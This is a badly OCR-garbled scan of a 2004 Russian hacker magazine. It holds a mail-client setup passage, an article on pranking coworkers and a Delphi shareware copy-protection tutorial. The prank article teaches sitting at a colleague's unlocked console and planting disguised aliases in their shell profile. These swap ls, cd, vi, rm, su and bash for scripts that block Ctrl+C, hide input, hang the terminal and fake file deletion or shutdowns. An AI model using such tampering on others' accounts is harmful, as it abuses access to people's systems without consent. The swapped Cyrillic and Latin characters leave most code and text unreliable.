# Открывать картинки при помощи щ (здесь можешь про- 
писать свой любимый вьюер) 

ітад е/*; ц ѵ %з >/беѵ/пиІІ 2>&1 

# Открывать ІіітІ-письма с помощью Іупх и ѵѵогсі-документы 
посредством саібос прямо в окне почтовика 

іехі/біті; Іупх -битр %$; соріоизоиіриі 
арріісаііоп/тзілюгб; саібос %з; соріоизоиіриі 



Как только закончишь с конфигом, откры- 
вай /еіс/таі І/аІ іазез , заменяй строку «гооЬ> 
на «гоой твое имя в системе» и выполняй 
команду пеѵѵаііазез. Теперь все диагности- 
ческие сообщения, направляемые гооТу, бу- 
дут приходить на твой локальный ящик. Все, 
проверим правильность настройки: 

# розіііх сбеск 



# Автоматически открывать ІіітГписьма 
аиіо_ѵіеѵѵ іехі/біті 

ідпоге * 

# Показывать только следующие заголовки 

ипідпоге Раіе То Ргош: ЗиЬіесі Х-Маііег Огдапігаііоп ІІ$ег- 
Адепі 

# Показывать заголовки в следующей последовательности 
Мгогбег Баіе То Х-Маііег ІІзег-Адепі Огдапігаііоп Ргот 
Зиіщі 



Этот файл можно расширять бесконечно, 
я привел лишь самые часто используемые 
варианты. 

А ПОСЛЕДНИЕ ПРИГОТОВЛЕНИЯ 

Последнее, что нужно сделать, - прописать 
некоторые команды в скрипт /еіс/ррр/ір-ир, 
который стартует сразу после успешного 
коннекта. Мы воспользуемся этой возмож- 
ностью и добавим в него следующие строки: 




Создай свой тиіі ;) 




Проверка безопасности 



# РЗ - занести письмо в черный лист (сюда засылай весь не 
отфильтрованный спам) 

тасго ілбех <РЗ> "|$а-Іеагп --зрапДп" "$рат" 
тасго радег <РЗ> "|$а-Іеагп --зрапДп" "$рат" 

# Р4 - занести письмо в белый лист (используй для новых 
контактов) 

тасго іпбех <Р4> "|$а-Іеат -Ііат\п" "лозрат" 
тасго радег <Р4> "|за-Іеагп -Ііат\п" "лозрат" 

# Ящики, проверяемые на наличие новой почты 
ліаіІЬохез 'ес!іо~/МаіІ/*' 

# Дефолтный ящик для сохраняемой почты 
заѵе-Рюок * =$аѵеб 

# Файл почтовых псевдонимов (сюда вносятся адреса нажа- 
тием клавиши "А") 

зеі аІіа$_ИІе=~/.таіІ_аІіа$е$ 
зоигсе ~/.таіІ_аІіазез 

# Не пищать 
зеі Ьеер=ло 

# Подставлять твой адрес при передаче почты зепбтаіГу 
(это розіііх'ный ѵѵгаррег) 

зеі епѵеІоре_Ргот=уез 

# Каталог с почтовыми ящиками 
зеі іоІбег="~/МаіГ 

# Путь до таіісар 

зеі таіІсар_раі!і="~/.таіІсар" 

# Сюда будет помещаться прочитанная почта 
зеі тЬох="=геаб" 

# Показывать 6 строк мини-индекса при просмотре сообще- 
ний (очень удобно) 

зеі радег_іпбех_1іпез=6 



# Запускаем рбпзб 
/изг/зЬіп/рбпзб 

# Отправляем почту 
/изг/збіп/зепбтаіі -д 

# Синхронизируем время 
/и$г/$Ьіп/пірбаіе 194.186.254.22 

Помимо ір-ир, существует еще файл ір- 
сіоѵѵп, он, как ты, наверное, уже догадался, 
получает управление после отключения. До- 
бавь в него строку «кіІІаІІ рсіпзсі», чтобы пос- 
ле дисконнекта рсіпзсі останавливался и не 
жрал зря ресурсы. 
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новый проект издательства (датеИагк) 




«ОѴБ ЭКСПЕРТ* - журнал о технике дли домашне*® кнногезгра 
Ежемесячной, глянцевый журнал 112 полос 



ОѴО-плееры. ресиверы. акустика, проекторы, телевизоры и другие 
компоненты домашнего кинотеатра - сравнительное тестирование 
наиболее интересных аппаратов на сегодня. Полнота охвата всех 
модельных рядов ори сохранении актуальности и новизны мате- 
риалов Информация о ценах и рекомендуемых местах покупки 
Тесты, обзоры, новости технологий, советы профессионалов Как 
установить технику и как «уложиться в бюджет» Журнал иэпиеэм 
простым и понятным «аждему языком Приложение к каждому 
номеру «ОѵО Эксперт» - [М> с фильмом 






30П0ДП0СТР0ЕНИЕ В ИШ 



КПКЕР/№1 0(70)/2004 



ето. Жаркий офис. Обеденный перерыв. Как попагается, все работники поспешили подкрепиться. Все, кроме тебя. Несмотря на то, 
что голод режет желудок, как бритва, ты решаешь остаться в душном помещении. Зачем? Все просто: один из твоих коллег так 
торопился, что забыл запаролить свою консоль. Пришло время для самого настоящего западпостроения, от которого жертва не 
отойдет до конца рабочего дня! 



ризнайся, ты давно хотел при- 
колоться над работником ІТ- 
отдела, весь персонал которо- 
го начальство заставило пе- 
рейти на І_іпих. Ведь ты каж- 
дый день наблюдаешь, как бе- 
долага листает маны и обра- 
щается за помощью к различ- 
ным ресурсам. Естественно, что служащему 
не дают рутовых прав - это равносильно 
смерти :), но чтобы реально поглумиться, те- 
бе хватит обычных пользовательских приви- 
легий. Для осуществления желаемого от тебя 
потребуются лишь две вещи: найти подходя- 
щую жертву и... прочитать этот материал. 

А ХОКЕРСКОЕ ВТОРЖЕНИЕ 

Первый прикол подойдет для абсолютно лю- 
бой жертвы. Угадай, кого больше всего бо- 
ится непросвещенный юзер? Правильно, ха- 
керов! Хакер для ламера сродни божеству, 
которого малограмотный пользователь ста- 
рается избегать. Как только работник увидит 
в консоли слово Маек, он тут же вскочит с 
места и закричит, как будто его писюк заго- 
релся! Давай же заставим бедного работни- 
ка сделать это :). Попробуем составить 
изысканный списочек файлов, после прос- 
мотра которого лицо даже самого стойкого 




человека покроется красными пятнами. 
Главное - пофантазировать и составить мас- 
сив ярких имен файлов, которые ну никак не 
должны находиться на компе жертвы. Пусть 
это будут слова сооі рогп, йоіап, ехріоф 
сісіоз, айаск и т.п. Мы не будем создавать 
эти файлы физически. Это не элитно :). Луч- 
ше наколбасить какой-нибудь скрипт, кото- 
рый заменит команду Із. 

Как ты знаешь, после входа пользователя 
в систему подгружается файл ~/-ЬазМ ргоТМе 
- эдакий профиль каждого логина (при ис- 
пользовании неначального/порожденного ин- 
терактивного командного интерпретатора 
все настройки читаются из конфига 
-/■ЬазМгс, а файлы /еіс/ргоТіІе, -/.ргоТМе 
~/ ЬазМ ргоТМе и ~/.ЬазМ Іодіп оболочкой иг- 
норируются, так что будь внимателен). Там 
могут объявляться новые переменные, про- 
цедуры и алиасы. Как раз последнее нам и 
пригодится. Мы засунем в профиль алиас на 
команду Із, а точнее, подгрузим шпионский 
файл -/-йтейопз с подложными ал пасами, 
чтобы не вызвать панику у слегка «продвину- 
того» юзера. 

На скрине видно, что .ЬазГі ргоТМе не вы- 
зывает никаких подозрений. Это нам и необ- 
ходимо. Прописав алиас в якобы служебном 
файле -/.ТипсТіопз, мы добились замены 



системной команды Із на ~/-Ттр/.Із (во вре- 
менном каталоге будут находиться все твои 
подложные сценарии). Когда плацдарм для 
прикола готов, можно приступить непосред- 
ственно к кодингу. 

Как я уже говорил, наша задача состоит в 
том, чтобы вывести список хакерских фай- 
лов по команде Із. Это просто, мало того, 
для остроты ощущений мы оформим все в 
цвете - ведь юзер привык, что листинг окра- 
шивает имена документов в разные цвета. 
Сперва поставим одно условие: если коман- 
да имеет параметры, то необходимо обра- 
щаться к реальному /Ып/Із. Только в против- 
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ЭЛВИС ТЕЛЕК ОМ 



ОРГАНИЗАЦИЯ 
ВЫДЕЛЕННЫХ КАНАЛОВ 
ИНТЕРНЕТ 

с использованием 



ном случае можно активизировать прикол. Таким образом, юзер 
не сразу догадается, что его подставили. 



.1$ собственной персоной 



іТ [ "$*" == ,т ] 
іііеп 

есііо -е "\033[01;32т0сІау- 

ехрІоіШ\Ш\033[00;ттгетар.с\п\033[01;32т7350Тип\ШШ\033[01;31тогаІ_зех.трд" 
есііо -е "аІІ- 

Іодѵѵірег$.Ід2\Ш\033[00;тра$$ѵѵогс1$.сгк\п\033[01;31тапаІ_$ех.аѵі\1;\1;\1\033[01;34трогпо" 



ехіі 

И 

I Ып/І$ --соІог=аиіо $* 

Необходимо знать, что служебная переменная $* хранит в се- 
бе аргументы команды. Ее мы, собственно, и анализируем. Для 
цветопечати нужно воспользоваться конструкцией \033[код_фо- 
на;код_цвета+т. Вся сложность прикола в том, что тебе потребу- 
ется грамотно выстроить и окрасить цепочку файлов. Результат 
поражает! Проверено на реальных жертвах. 



На самом деле ничего 
удалять мы не будем, 
просто припугнем юзера 



Л ЗЛОПОЛУЧНЫЕ котопоги 

Если тебе кажется, что прикол с Із не выведет жертву из себя, 
можно попробовать насолить коллеге с помощью команды сб. Ин- 
тересно, как нормальный человек отреагирует на то, что из-за пе- 
рехода в каталог стали бы удаляться файлы во всех папках? :). 
Пришло время это проверить. Прописывай второй алиас в виде 
аііаз сб=~/-йпр/-сб и приступай к кодингу смертельного сценария. 

На самом деле ничего удалять мы не будем, просто припугнем 
юзера, что вся его информация может полететь к чертовой мате- 
ри, и не забудем перехватить сигнал ЗІОІМТ (который, как изве- 
стно, посылается при нажатии СТгІ+С). Все это реально сделать 
в маленьком Ьазб-скрипте. 



Запусти сб и попрощайся с системой 




технологии 

РАІЛИЧММЕ ВАРИАНТЫ ГШДЙЛІЮЧЕННЯ 
I Ы С О К И I СКОРОСТИ 
ХОРОШИЕ ТАРИФЫ 1 



#!/Ьіп/$Іі 

ігар ігие 5І6ШТ 
0ІРЗ='/Ьіп/І$ -1 /' 

Тог еасіі іп ЗйІРЗ 
(ІО 

есііо "гт: саппоі гетоѵе бігесіогу \'/$еасТі': 1$ а бігесіогу" 
гап(1=$((Ш00М%10 + 1)) 

$Іеер Згапсі 
бопе 
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Удаляем корневой каталог 



Первым делом мы перехватили сигнал. Это осуществляется 
шелловой командой Ігар, которой передаются два параметра: ко- 
манда, выполняемая после прихода сигнала, и сам сигнал. Далее 
выполняем листинг корневого каталога и загоняем вывод в пере- 
менную. Затем создаем цикл по каждой строчке переменной (а 
строка - название папки в корне) и оповещаем юзера, что внутрен- 
ности системы незамедлительно удаляются (лишь верхним папкам 
удается уцелеть :)). Чтобы жертва не приняла удаление за прикол, 
генерируем случайное число от 1 до 10 и молчим все это время. В 
итоге создается реальное ощущение работы с каталогами ;). 

Угадай, что сделает юзер в первую очередь, как увидит подоб- 
ное сообщение? Разумеется, нажмет СГгІ+С. Но не тут-то было! 
Перехват сделает свое дело и не даст команде аварийно завер- 
шиться. Юзер напрасно тратит нервы на убийство роковой ко- 
манды, бьет кулаками по клавиатуре и монитору и кричит благим 
матом :). Зрелище, которое ты так давно хотел увидеть. 

Л ОН ВЫКЛЮЧИЛ СЕРВЕР! 

Что делают работники в консоли? Правильно, работают :). Кор- 
ректируют документы, компилят различные сценарии и никчем- 
ные проекты. Пришло время нарушить их рабочую идиллию и 
вмешаться в процесс грязными хакерскими руками: создать 
алиас на профессиональный редактор ѵі, которым пользуются 
особо одаренные линуксоиды. Этот скрипт внушит твоему лю- 
бимому коллеге мысль, от которой у него может пропасть дыха- 
ние и желание жить :). На его экране появится сообщение, ха- 
рактерное для процесса завершения работы, консоль повиснет, 
а ты и твои заранее предупрежденные сотрудники повернетесь 
к нему и начнете «благодарить» разными словами. Ведь он 
только что... удаленно уронил сервер! 

Уверен, что у такого работника пропадет желание трудиться до 
конца смены, даже несмотря на то, что на самом деле никакого 
шатдауна не произойдет. 



.ѵі вызывающий У1 



#!/Ьіп/$Іі 

0АТЕ=$(І.С_АІ1=еп(]аіе +'%с') 

ТТУ=$(Ьа$епате 'Ну') 

есііо -е "ВгоаОсазі те$$аде Ггот $Ц$ЕР (рі$/$ТТѴ) ($ОАТЕ)\п\пТІіе $у$іет і$ доіпд сіоѵѵп Гог 
$у$іет Ііаіі ІШ!" 

$Іеер 500 

Чтобы осуществить прикол, нужно знать вывод команды баІГ. 
Уверен, ты выучил его наизусть. Осталось лишь вставить в мессагу 
переменные $ІІЗЕВ, $ТТѴ и текущую дату. Последняя выводится на 
буржуйском языке в формате %с, как это видно из кода. Что каса- 
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Таинственное подвисание в консоли 



17 Л, 






подложи свинью в консопь 



ется псевдоустройства, то прежде чем его на- 
печатать, необходимо удалить из переменной 
каталог /беѵ/. Эта проблема быстро решается 
при помощи регвыра утилиты зесі, либо при 
помощи программы Ьазепате. В скрипте был 
использован второй вариант. Можешь нагру- 
зить сценарий перехватом сигнала 8ІОІМТ 
(чтобы реальнее было!) и отключением отоб- 
ражения символов (с помощью команды зйу). 

^ 9Д0ПЯЕИ... И ЗПВИСОЕИ! 

Часто юзер вычищает из своего каталога му- 
сор. Чтобы выпендриться, некоторые лич- 
ности юзают консольную команду гт, а не 
удобный интерфейс редактора тс. Над таки- 
ми коллегами мы и будем прикалываться. 
Представь, что юзер запустил гт, а бинар- 
ник злосчастно завис. Жертва будет искать 
всевозможные причины - протрояненный 



когда найдет, не отойдет от открытой консо- 
ли ни на шаг. К тому же, если администра- 
тор не запалил тебя у его компа, у тебя бу- 
дет железное алиби :). Да, собственно, при- 
кол будет безобидным. Всего-то выведем 
админу сообщение, что он недостоин руто- 
вых привилегий. Поверь, такие мессаги 
больше всего бесят сисадмов :). 

Как ты догадался, мы переопределим 
вызов /Ьіп/зи на поддельный .зи. В нем на- 
пишем, что «к сожалению, юзер не имеет 
прав для вызова /Ьіп/зи». Естественно, 
прежде чем смотреть алиасы, админ будет 
долго анализировать свои права и добав- 
лять себя в неизвестные группы (если, ко- 
нечно, под рукой будет открытая рутовая 
консоль), а лишь затем догадается о подс- 
таве. Немного фантазии - и ты можешь 
превратить .зи в полноценный рутовый 



И наконец, самый хардкорный сценарий, 
реализацию которого я оставил на десерт. 



/Ьіп/гт, падение сервера или повреждение 
кабеля. От тебя требуется лишь поддакивать 
ламеру, мол, у меня такая же проблема, не 
волнуйся, друг :). 

Алгоритм сценария будет следующим: 
скрипт проанализирует параметры гт и 
возьмет последний в качестве файла (так 
оно и бывает чаще всего). Затем будет вы- 
ведено предупреждение об удалении особо 
важного документа. Юзер, не раздумывая, 
попытается нажать «у», но не тут-то было! 
Консоль намертво подвиснет. Это произой- 
дет из-за того, что в сценарии будет выклю- 
чено отображение ввода, а также перехва- 
чен сигнал 5ЮІМТ. 



.гт - удалит файл и подвесит систему 



#!/Ьіп/$Іі 

ігар "$ііу есііо" ЕХІТ 
ігар ігие 5І6ШТ 
Тог Тііе іп "$@" 

(ІО 

Іа$і=$іііе 

сіопе 

есііо -п "гт: гетоѵе ѵѵгііе-ргоіесіей гедиіаг Тііе \'$ТМе'? " 
'$ііу -есііо' 
йііе геасі Зсіеер 
(ІО 

ТаІ$е >Меѵ/пиІІ 2>&1 
сіопе 



Видно, что на всякий случай я перехва- 
тил и второй сигнал - сигнал выхода из 
программы. Когда это произойдет (через 
кіІІ и т.п.), все символы снова будут отобра- 
жаться как ни в чем не бывало. До повтор- 
ного запуска /Ьіп/гт :). 

Л ТОЛЬКО ДЛЯ ПОСВЯЩЕННЫХ! 

По счастливой случайности ты увидел откры- 
тую консоль админа, который владеет руто- 
вым паролем? Очень хорошо! Самое время 
для приколов над умными людьми. Я уве- 
рен, сисадм долго будет искать подставу, а 



шелл, который будет слегка глючить и 
сбоить. Вот и весь сценарий: 

Шп/$Іі 

есііо -е "Той аге поі аііоѵѵесі іо $и гооі!\п$оггу." 

Пользуясь случаем, напомню, что пара- 
метр -е позволяет обрабатывать специаль- 
ные символы типа возврата каретки, табуля- 
ции и т.п. 

Л ЧТО НОН СТОИТ ШЕПП 
ПОСТРОИТЬ? 

И наконец, самый хардкорный сценарий, 
реализацию которого я оставил на десерт. 
Оно понятно, теперь ты владеешь всеми 
ЬазЬ-заподлянками и можешь наколбасить 
суперский скрипт. Сейчас мы подменим не 
какой-нибудь бинарник, а целый командный 
интерпретатор! 

Когда юзер отойдет на обед (в туалет, по- 
курить, поговорить по мобиле - нужное под- 
черкнуть ;)), аккуратно перенеси подложный 
скрипт в его каталог, а затем запусти его. 
Перед этим ты умело подкорректируешь 
приглашение интерпретатора, а также при- 
думаешь заподля некие выводы от команд 
(впрочем, можешь оставить дефолтовые - я 
не обижусь). Собственно, творение называ- 
ется ЬазЬ, выполняет функции /Ьіп/ЬазЬ, а на 
первый взгляд вообще неотличимо от шел- 
ла. Но только на первый :). Стоит юзеру вы- 
полнить какую-нибудь команду, как скрипт 
ругнется на нехватку памяти, на права, на 
ошибку сегментации. В итоге у юзера пропа- 
дет желание работать, а у тебя существенно 
поднимется настроение и боевой дух :). 



Поддельный интерпретатор 



Шп/$іі 

ВЕ6Ш='[и$ег@ІосаІііо$і и$ег]$ 
ігар "есііо -п 8ВЕ6Ш" ЗІ6ШТ 
ѵѵііііе ігие; (іо 
есііо -п "$ВЕ6Ш" 
геа(1 сок! 



іН"$сішГ != "] 
іііеп 

гап(К((ІШ0М%5ф) 
са$е "Згаікі" іп 

"Г ) есііо "Зедтепіаііоп іаиіі (соге сіитреф" 

"2" ) есііо "-Ьа$іі: іогк: гезоигее іетрогагу ипаѵаііаЫе" 

"3" ) есііо "-Ьазіі: $спкі: соттапсі поі Тоипгі" 

"4" ) есііо "-Ьазіі: $сті1: Регтіззіоп ЬепіеЬ" 

"5" ) есЬо "М іог 5 тіпиіез" 
зіеер 300 

езас 

іі 

сіопе 

Как я уже сказал, нужно подправить приг- 
лашение. Оно задается в первой строке ко- 
да. Затем переопределяется реакция на 
ЗІСІИТ (полная имитация СТгІ+С). Потом 
входим в бесконечный цикл и читаем там 
команду. Если она поступила, генерируем 
случайное число от 1 до 5 (это ты уже уме- 
ешь делать). Далее анализируем число: ес- 
ли это единица - выдаем ошибку сегмента- 
ции, двойка - ругаемся на нехватку памяти, 
тройка - пишем ошибку 404 :), четверка - 
ругаемся на права, пятерка - вынуждаем 
юзера подождать 5 минут. Никто не мешает 
тебе нагенерить собственные шутки и внед- 
рить их в скрипт. Для этого достаточно рас- 
ширить диапазон рандома и вставить пару 
строк в конструкцию сазе/езас. Можно при- 
думать всего один прикол, а в остальных 
случаях исправно выполнять команду. Воз- 
можно, так будет интереснее: юзер не сразу 
поймет, что над ним прикололись. 

Л ШУТИ, НО НЕ ЗПБЫВПЙСЯ! 

Как видишь, даже без рута можно так нало- 
мать дров, что твой сотрудник упадет в оса- 
док. Однако я привел примеры безобидных 
шуток, которые не вредят здоровью компью- 
тера. Конечно, я полагаю, что ты способен на 
большее, но лучше этого не делать, посколь- 
ку человек - существо мстительное, а значит, 
результат злой шутки может быть непредска- 
зуемым. Как минимум, в тебя кинут клавиа- 
турой, в более серьезных случаях - настучат 
начальству. А начальники не понимают по- 
добных приколов, поэтому запросто могут 
лишить тебя премии или вообще уволить. 

В общем, я тебя предупредил! 





а Отличная статья 
по ЬазН-програм- 
мированию на 
шл/і/.ореппеі.ги/сіо 
С5/ВІІ$/Ьа5І1_5СГІрІІ 
пд_диіс!е/ поможет 
тебе в составлении 
новых злых 
скриптов. 




л Конструкция 
«ігар " 2» позволя- 
ет проигнориро- 
вать ЗІСШТ, но 
скриптовый при- 
мер более инфор- 
мативен :). 




л На компакте вы- 
ложены все скрип- 
ты, обсуждаемые в 
этой статье, а так- 
же несколько по- 
лезных доков по 
Ьазіі. 

ЧІН 

а Этот материал 
предназначен толь- 
ко для ознакомле- 
ния. Применение 
его в корыстных 
целях может при- 
вести к тяжким пос- 
ледствиям. За это 
редакция и автор 
не несут никакой 
ответственности. 



117 










аждый начинающий программист думает о том, как защитить свою собственность, чтобы юзеры платили за прлграмму, а не 
исплльзовапи ее направо и налево и при этом бесплатно. Такое стремление понятно, потому что всем хочется кушать и обидна 
лтдавать какому-то чайнику на халяву свой многомесячный труд. 



кок защитить свои программы от взпома 



остроение защиты - достаточ- 
но сложное занятие. Это веч- 
ная борьба между програм- 
мистами и хакерами, и в кон- 
це концов всегда побеждают 
последние. Еще не создава- 
лось такой защиты, которую 
не сломали бы хакеры! Так что 
же теперь, вообще не защищаться? Нет! За- 
щита, конечно же, должна быть, например, 
в виде серийных номеров. С их помощью 
мы будем контролировать зарегистрирован- 
ных пользователей и вести учет. Но вместе 
с тем защита должна быть простой, чтобы 
не отнимать у нас слишком много времени 
на создание того, что все равно взломают. 

Л ЦЕНП-КПЧЕСТВО 

Некоторые считают, что защита должна 
быть такой, чтобы затраты на ее взлом были 
больше, чем на покупку софта. Но как оце- 
нить затраты на взлом и затраты на покуп- 
ку? Посмотрим на почтовый клиент ТМе Ваі, 
цена которого находится в пределах от $25 
до $45. Для буржуев это не так уж много, а 
защита в программе достаточно продумана 
и хорошо реализована. Но несмотря на это, 
в интернете кряки лежат на каждом углу. 





Если у хакера нет даже $20 на покупку 
программы, то он ее взломает и выложит 
кряк на всеобщее обозрение. Так уж сло- 
жилось, что основные хакерские умы - на- 
род небогатый (борцы за Ореп Зоигсе и то- 



му подобное), поэтому многие и ломают 
все, что плохо лежит. Для остальных поль- 
зователей затраты на взлом сводятся к по- 
иску и скачиванию готовой вакцины, то 
есть стремятся к нулю. 
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УЖЕ В ПРОРАЖЕ 




і Взломать сложно, но пользователи 1 
и разработчики не любят программы, 
т защищенные так сильно. т 



^ полная защита 

Для кодеров, не желающих заниматься соз- 
данием собственной защиты, есть готовое 
решение - стать участником сети продажи 
прог Оідііаі Віѵег. Такой кодер получает в 
свое распоряжение специальную прогу, ко- 
торая защищает исполняемый файл шифро- 
ванием. Взломать сложно, но пользователи 
и разработчики не любят программы, защи- 
щенные так сильно. Для программиста это 
светит сложными манипуляциями по шиф- 

ЛИСТИНГ. ПЕРВЫЙ 

этап проверки кода 

ѵаг 

Тетр$ігіпд:$ігіпд; 
і, г : КеаІ; 

Ьедіп 

Тетр$ігіпд:="; 

ІТ поі ІприЮиегуСРегистрация', 'Введи 
регистрационный код', ТетрЗігіпд) іііеп ехіі; 
іі і>1000000 іііеп СІозе; 
г4епдііі(Тетр$ігіпд)-1+25-20; 

//Проверяем первую часть 
іі сору(Тетр$ігіпд,10,4)<>'4321' іііеп Тегтіпаіеі; 
ііі>1000000 іііеп СІозе; 

2:4епдііі(Тетр$ігіпд)-1+25-20; 

і:=і-2; 

іі і<0 іііеп СІозе; 
епсі; 

//Проверяем конец строки 
іі сору(Тетр$ігіпд,10,4)<>'4321' іііеп Тегтіпаіе2; 

//Опять ненужные вычисления 
//Сохранение кода в реестре 
//Опять ненужные вычисления 
епсі; 



рованию и созданию ключей перед тем, как 
выложить файл в сеть, а для конечных поль- 
зователей это создает проблемы при реги- 
страции. Слишком сложен процесс актива- 
ции регистрационного кода, а буржуи за 
свои зеленые не хотят совершать лишние 
телодвижения. 

Из-за таких сложностей сеть не получила 
распространения среди шароварщиков, хотя 
защита их считается самой лучшей. Я думаю, 
если бы сеть получила большее распростра- 
нение, то ее защита уже давно бы пала :). 

А КПЧЕСТВО ОПРЕДЕЛЯЕТ ЦЕНУ 

Ты думаешь, если для программы есть кряк, 
ее не будут покупать? Сильно ошибаешься! 
Для многих программ есть кряки, но юзеры 
тратят деньги, потому что они платят не за 
софт, а за поддержку и за то, чтобы не было 
проблем с поиском вакцины для обновлен- 
ной версии. За хорошую программу запла- 
тят, даже если защита будет самой простой 
и ее сможет взломать электрический кипя- 
тильник, не говоря уже о чайнике. 

Когда цена соответствует качеству прог- 
раммы, буржуи обязательно отдают за нее 
своих зеленых президентов. При этом жела- 
тельно, чтобы цена не превышала $39, иначе 
действительно проще найти кряк, даже если 
программа является шедевром и будет пред- 
лагаться самая лучшая поддержка. 

Так что скромность - залог успеха. 

Теперь у тебя может сложиться впечатле- 
ние, что защита в программе - вещь абсо- 
лютно бесполезная. Однако если вообще не 
ставить заслона от хака, то ломать начнут 
даже убежденные чайники, и уже не от жад- 
ности, а для того, чтобы Василий Пупло смог 
гордо сказать своим друзьям: «Сегодня я 
сломал прогу. Я, наверное, хакер. Можете не 
аплодировать и не вставать» :). 




В НОМЕРЕ: 

ѴѴагііаттег 40.000: Оаѵѵп оі ѴѴаг 

С космооперы Нотеѵѵогісі «Релики» 
переключились на вселенную 
ѴѴагііаттег 40.000. 

Результат, как всегда, впечатляет. 

Токуо бате Зіюѵѵ 2004 

Слайд-шоу с масштабнейшей 
игровой выставки года в 
сопровождении постера со 
знаменитым токийским косплеем. 

Незісіепі Еѵіі 4 

По заявлениям большинства 
наших коллег, эта игра стала 
наиболее впечатляющей на 
прошедшей ТОЗ 2004. 

Мы с ними согласны. 

71іе Зітз 2 

Казалось, самая продаваемая 
игра замерла в развитии, 
но нет - перед вами абсолютно 
новый трехмерный шедевр 
«симомании». 

СТРАНА 

ИГР 

(дате)іаті 

ѵѵѵѵѵѵ. д а пл е I а п сі . г и 
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л В качестве 
дополнительной 
инфы советую 
почитать статью 
«Защита программ 
от взлома» на 
ИНр://2-оІ.сИа1.ш/ 
ргоіесіі.іііт. 
Возможно, ты 
улучшишь 
описанный мной 
алгоритм и 
сделаешь его 
круче. 



А практикам защиты 

Когда я впервые (чисто для тренировки) 
попробовал сломать чужую программу, то 
на все про все ушло около получаса. В то 
время я очень плохо знал АззетЫег и сна- 
чала пытался разобраться в методе провер- 
ки пароля. Потом запустил поиск по функ- 
ции выхода 21-го прерывания и нашел все 
точки выхода из программы. И тут я увидел 
конструкцию, которая народным языком 
описывается так: если результат проверки 
не содержит нужного значения, то выход. 
Именно так завершается большинство про- 
верок пароля. Каким бы сложным ни был 
алгоритм, в конце концов будет простая 
проверка на правильность и переход на за- 
вершение проги. Для взлома нужно просто 
убрать выход, и все. 

Итак, чтобы усложнить жизнь хакерам, 
нужно замаскировать выход, а точнее, де- 
лать его нестандартным способом. Нормаль- 
ный выход в Эеірііі - это закрытие основной 
формы, при этом вызывается метод 
АррІісайоп.ТегтіпаІе. Можно и напрямую вы- 
зывать этот метод. Но это уже стандартный 
выход, который генерирует событие 
ѴѴМ СШЗЕ и легко вычисляется. 

Программеры на Эеірііі могут при непра- 
вильном вводе пароля вызывать метод НаІЕ 
Этот метод не генерирует никаких событий, 
а просто вырубает программу. Не все хаке- 
ры смогут сразу вычислить такой выход, и 
это увеличивает время поиска. 

А ПЕРВЫЙ ЭТПП 

Каким должен быть регистрационный код? 
Он может быть и простым (числовым), 
главное - сделать красивую проверку в раз- 
ных местах. Например, после ввода пароля 
можно проверять код по маске. Допустим, 
мы решили, что первые четыре символа 
должны быть 1234, а символы с 10-го по 
13-й - 4321 . Что будет между ними и после 
этого, не имеет значения, например, число 
1234001904321 будет соответствовать шаб- 
лону. Для реализации проверки по шаблону 
можно использовать примерно такой код, 
какой указан в листинге. 

Функции Тегтіпаіеі и ТегтіпаІе2 - это 
выход из программы, в них можно также 
насовать бесполезных расчетов и между 




ними незаметно вставить вызов НаІІ Поче- 
му две функции? Они должны быть немного 
разными, чтобы усложнить жизнь хакера. 
Для взлома одной-единственной было бы 
достаточно заблокировать ее вызов. 

Между реальными проверками делаем 
множество бесполезных расчетов с вызовом 
метода СІозе, который закрывает приложе- 
ние. Эти расчеты и проверки должны рабо- 
тать так, чтобы результат был всегда раз- 
ным, но при этом выход из программы ни- 
когда не выполнился. Это опять же бутафо- 
рия, которая нужна только для отвода глаз. 

А игры закончились 

В середине проверок, после того как мы 
убедились, что регистрационный код нас 
устраивает, можно сохранить его прямо в 
реестре. Сейчас это не столь важно. Хакер, 
конечно же, увидит запись в реестре и воз- 
радуется. Он еще не знает, что радоваться 
ему рано ;). Вычислив шаблон среди бес- 
полезных расчетов и написав генератор, в 
котором крайние значения фиксированы, а 
середина генерируется случайным обра- 
зом, он успокоится и тут же выложит кряк 
для всеобщего пользования. Чтобы его 
уверенность была крепче, после выполне- 
ния всех описанных выше проверок нужно 
обязательно вывести сообщение об удач- 
ной регистрации. Как ты уже догадался, 
первый этап проверки создавался только 
для отвода глаз, и хакеры его быстро най- 
дут по этому сообщению. 

А ВТОРОЙ ЭТПП 

Итак, у нас есть в реестре код. Нужно сде- 
лать дополнительные проверки. Допустим, 
ты пишешь почтовый клиент. Пользователь 
его зарегистрировал, и мы сохранили код в 
реестре. Теперь при каждой проверке почты 
(или в другом важном месте программы) 
нужно брать регистрационный код и делать 



дополнительные проверки, но уже не по шаб- 
лону. Например, можно сложить все числа и 
сделать какие-то дополнительные преобра- 
зования, а затем проверить результат: 



Второй зтап проверки кода 



ІпсІех:=0; 

II В КедСоб хранится регистрационный код 
Тог і:=1 іо І.епді[і(РедСо(1) (Іо 
іпс1ех:=іп(1ех+ $ігТоІпШеі(РедСо(1[іп(1ех], 0) 
іі іпбех<>0 іііеп 
Ьедіп 

АррІісаііоп.Ме$$адеВох("Ошибка в программе №123, обрати- 
тесь к разработчику", "Ошибка", МВ_0К); 

II ІегтіпаіеЗ - очередной выход из программы, который не 
II должен вызываться на первом этапе проверки 
ІегтіпаіеЗ; 
епб; 



Здесь я просто складываю все числа в 
коде (ты должен сделать что-то посложнее), 
Если результат неверен, то вывожу сообще- 
ние об ошибке под номером 123, и прог- 
рамма прерывает свое выполнение. Если 
это увидит зарегистрированный пользова- 
тель и пришлет жалобу, то можно попро- 
сить его скачать новую версию программы 
и перерегистрироваться. Ни в коем случае 
не говори об ошибке регистрации и сгене- 
рированном коде. Никто не должен знать, 
что эта мессага появляется из-за дополни- 
тельных проверок регистрации. 

А КОНТРОЛЬНЫЙ ВЫСТРЕЛ 

Мы рассмотрели только два этапа проверки 
пароля, но их можно сделать и больше. Это 
уже зависит от личных предпочтений, сво- 
бодного времени и желания. 

Прежде чем выкладывать готовую прог- 
рамму на сайт, советую сжать исполняе- 
мый файл такими архиваторами, как 



Ни в коем случае не говори об ошибке 
регистрации и сгенерированном коде. 
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АЗРаск или РЕРаск. Это остановит большую часть хакеров, осо- 
бенно начинающих и тунеядцев. Продвинутого перца ничего не ос- 
тановит, и он найдет, как разархивировать программу. Благо 
продвинутых не так много, и они очень редко занимаются шарова- 
рами. Великие умы взламывают ѴѴіпсІоѵѵз, ЗОЗШсІіо Мах и т.д., где 
защита более интересная и соответствует их знаниям и умениям. 

Не стоит также делать слишком сложный регистрационный код, 
если он не привязывается к оборудованию пользователя. В этом слу- 
чае, если хакер не сможет взломать защиту и написать генератор 
